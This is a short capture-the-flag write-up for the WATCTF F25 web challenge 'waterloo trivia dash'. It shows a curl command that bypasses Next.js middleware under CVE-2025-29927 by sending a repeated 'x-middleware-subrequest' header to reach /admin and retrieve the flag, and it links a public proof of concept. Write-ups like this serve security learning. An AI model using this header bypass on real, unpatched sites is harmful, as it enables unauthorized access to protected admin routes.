> For the complete documentation index, see [llms.txt](https://thienguen.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thienguen.gitbook.io/ctf-writeups/ctf/2025/watctf-f25/web.md).

# web

## waterloo trivia dash

> Test your knowledge about Waterloo with this fun trivia game! Complete the quiz to unlock the prize page and claim your reward. <http://challs.watctf.org:3080/>

Although it does takes me a fat minutes to realized but I have already done a similar challenge in the past...so this is a freebie. After checking the version of Nextjs through wappalyzer.

### tldr;

<div><figure><img src="/files/c8nwkC4O6jlOfQGmo5cx" alt=""><figcaption></figcaption></figure> <figure><img src="/files/QDdCYQT7glxPFmWCgOpr" alt=""><figcaption></figcaption></figure></div>

{% hint style="info" %}
A next.js app with middleware protecting `/admin`. CVE-2025-29927 lets you bypass middleware by sending an internal subrequest via the header `x-middleware-subrequest` with repeated `src/middleware`. I used the public PoC to scan endpoints and found `/admin` and `/admin/login` were indeed vulnerable.&#x20;

Requesting `/admin` with the bypass header returned the flag.
{% endhint %}

```bash
❯ curl -sSL --compressed 'http://challs.watctf.org:3080/admin'
-H 'x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware'
| strings | grep -oE 'watctf\{[^}]+\}'
watctf{next_js_middleware_is_cool}
```

Flag — <mark style="color:$warning;">**`watctf{next_js_middleware_is_cool}`**</mark>

Reference

* The crafted header makes Next.js treat the request like an internal middleware subrequest. Combined with RSC/Next headers, this causes the middleware to be skipped or misapplied, exposing protected routes.
  * PoC: <https://github.com/websecnl/CVE-2025-29927-PoC-Exploit>
